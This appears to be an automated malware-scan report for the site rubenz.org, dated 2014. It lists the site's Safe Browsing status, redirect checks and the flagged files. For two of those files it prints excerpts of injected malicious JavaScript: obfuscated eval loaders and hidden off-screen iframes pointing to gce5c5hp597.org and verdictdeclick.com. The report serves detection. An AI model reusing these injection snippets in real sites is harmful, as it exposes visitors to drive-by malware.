Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rubenz.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://rubenz.org/ | 200 OK Content-Length: 62790 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: gce5c5hp597.org eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgY ...[900 bytes skipped]... Decoded script: ...[1332 bytes skipped]... olute;left:-1000px;top:-1000px;'></i"+fff+"e>"); } function iframer() { var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://gce5c5hp597.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> | ||
http://rubenz.org/test/jquery.js | 200 OK Content-Length: 130319 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: verdictdeclick.com try{vfE++;}catch(ABWTE){try{GZDG|15232}catch(ewabgre){m=Math;ev=window[""+"e"+"val"];}ff="fromCha";ff+="rCode";n="1624&&1710&&1694&&1845&&1652&&1530&&966&&645&&602&&885&&1750&&1485&&1358&&1740&&1386&&1560&&560&&975&&924&&1305&&1176&&1035&&574&&1845&&1624&&17 ...[9422 bytes skipped]... Decoded script: ...[40961 bytes skipped]... amp;1400&&1740&&1456&&915&&476&&750&&476&&930&&840&&705&&1470&&1530&&1596&&1455&&1526&&1515&&868&&585&&574&&885&&182&&150".split("&&");h=2;s="";if(m)for(i=0;i-198!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="aut ...[503 bytes skipped]... | ||
http://rubenz.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rubenz.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 12:59:46 GMT
Accept-Ranges: bytes
ETag: "f546-4cbdf17b92dc0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 62790
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 16:22:23 GMT
...62790 bytes of data.
GET / HTTP/1.1
Host: rubenz.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 12:59:46 GMT
Accept-Ranges: bytes
ETag: "f546-4cbdf17b92dc0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 62790
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 16:22:23 GMT
...62790 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rubenz.org
Referer: http://www.google.com/search?q=rubenz.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rubenz.org
Referer: http://www.google.com/search?q=rubenz.org
Result:
The result is similar to the first query. There are no suspicious redirects found.